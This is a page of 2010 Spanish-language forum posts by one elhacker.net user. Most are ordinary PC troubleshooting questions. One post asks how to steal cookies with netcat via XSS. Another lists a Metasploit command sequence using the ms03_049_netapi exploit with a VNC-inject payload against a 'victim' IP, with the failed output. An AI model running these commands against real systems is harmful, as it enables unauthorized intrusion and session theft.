elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: 1 2 [3]
21  Foros Generales / Dudas Generales / Como desinstalar Linux (Ubuntu).. en: 2 Diciembre 2010, 19:21 pm
Buenas users.
Tengo una duda y quisiera que me ayudaran .Bueno mi pregunta es que quiero desinstalar linux (Ubuntu) por que creo que me está dando problema al arrancar el PC y por eso quiero desinstalar Linux.

Y bueno e intentado con introducir el CD y no me da la opción de desinstalar y creo que la unica manera es formateando la partición pero el problema es que no me da la opción de formatear.

Aquí una imagen:





Que puedo hacer en esa ocasió ?

Gracias por sus respuestas.
22  Foros Generales / Dudas Generales / Problema de particón. en: 26 Septiembre 2010, 18:25 pm
Buenas users de El Hacker.net.
Tengo un problema con mis particiones.
Les cuento: Mi problema esque tenía 2 particiones y quería hacer otra particion con el partition magic y justamente cuando la estaba creando
se me reinicio el PC y desconozco el problema del reinicio. Y cuando entré a " Mi PC " no tenía la partición de antes. Y me gustaría volver a
recuperar los gigas del disco duro y si es posible poder recuperar la partición.

Tengo 500 GB de disco y en la particion anterior tenía 54 GB.

Les muestro una imagen de Administración De Discos.




(Espero averme especificado de buena forma)

Hay alguna solución para este problema ?

Gracias por sus ayudas.  ;)
23  Comunicaciones / Mensajería / Problemas con la opción de Video llamada de Messenger. en: 2 Septiembre 2010, 13:43 pm
Buenas

Quisiera que me ayudaran en un problema que tengo la mi Camara de mi PC , y esque cuando intento
establecer una video llamada con algun amigo/a de mis contactos de messenger pues no puedo establecer
la video llamada por que segun la Camara no está conectada y lo raro esque solo para en mi cuenta de
messenger (En la cuenta de mi tio si puede establer la video llamada).

Si quieren más detalles mandar un Mensaje Privado (MP)

Gracias por su ayuda.
Espero sus respuestas.
24  Foros Generales / Dudas Generales / Problemas con el teclado ( Configuración ) . en: 2 Septiembre 2010, 13:29 pm
Buenas users tengo un problema y quiero que me ayuden   .

El problema que tengo esque creo que el teclado está mal configurado veran ahora cuando chateo por messenger y quiero poner el signo de Interrogacion ( ? ) , pues me sale los el barra baja ( _ )  y y si pincho en la ( ñ ) pues me sale el punto y coma ( ; ) son varias teclas que tienen ese problemaque  me cambian de caracter.

(Seguramente algun usuario le a pasado este problema)
Espero que me puedan ayudar .

Gracias.
25  Sistemas Operativos / GNU/Linux / Como redireccionar una página a mi PC ? en: 30 Julio 2010, 17:10 pm
Buenas users.

Tengo una pregunta.Y esque tengo entendido que con el netcat se puede robar cookies,
pero necesito que redireccionar las página a mi PC y no se como hacerlo.

Lo unico que tengo entendido esque tengo que buscar vulnerabilidades en las páginas de tipo XSS.
Pueden ayudarme ?

Gracias.
26  Foros Generales / Dudas Generales / Se puede investigar alguna IP ? en: 6 Julio 2010, 00:40 am
Buenas gente de ( El.Hacker) me gustaría saber si se puede investigar alguna IP pero que no sea el WHOIS.El WHOIS no me da información, y me gustaría saber de donde es la ip ect...
27  Seguridad Informática / Bugs y Exploits / Errores de metasploit. en: 1 Julio 2010, 23:46 pm
hola gente de E.H ( el hacker ) me gustaría que me aclararan una duda y esque intento penetrar a mi otro pc con el metasploit
y me sale errores y quiera saber si estan bien los comandos.

Son los siguientes comandos:

- msf > show exploits
- msf > use windows/smb/ms03_049_netapi
- msf exploit(ms03_049_netapi) > show targets
- msf exploit(ms03_049_netapi) > set TARGET 0
- msf exploit(ms03_049_netapi) > show payloads
- msf exploit(ms03_049_netapi) > set PAYLOAD windows/vncinject/bind_tcp
- msf exploit(ms03_049_netapi) > set LHOST ( Mi IP )
- msf exploit(ms03_049_netapi) > set RHOST ( IP de la Victima )
- msf exploit(ms03_049_netapi) > exploit


Estos son los errores que me salen:

  • Started bind handler
  • Binding to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.1.33[\BROWSER] ...
  • [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
  • Exploit completed, but no session was created

Espero no estar incumpliendo las reglas y no estar haciendo doble post.

Gracias.

ATT:ProxyHack
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines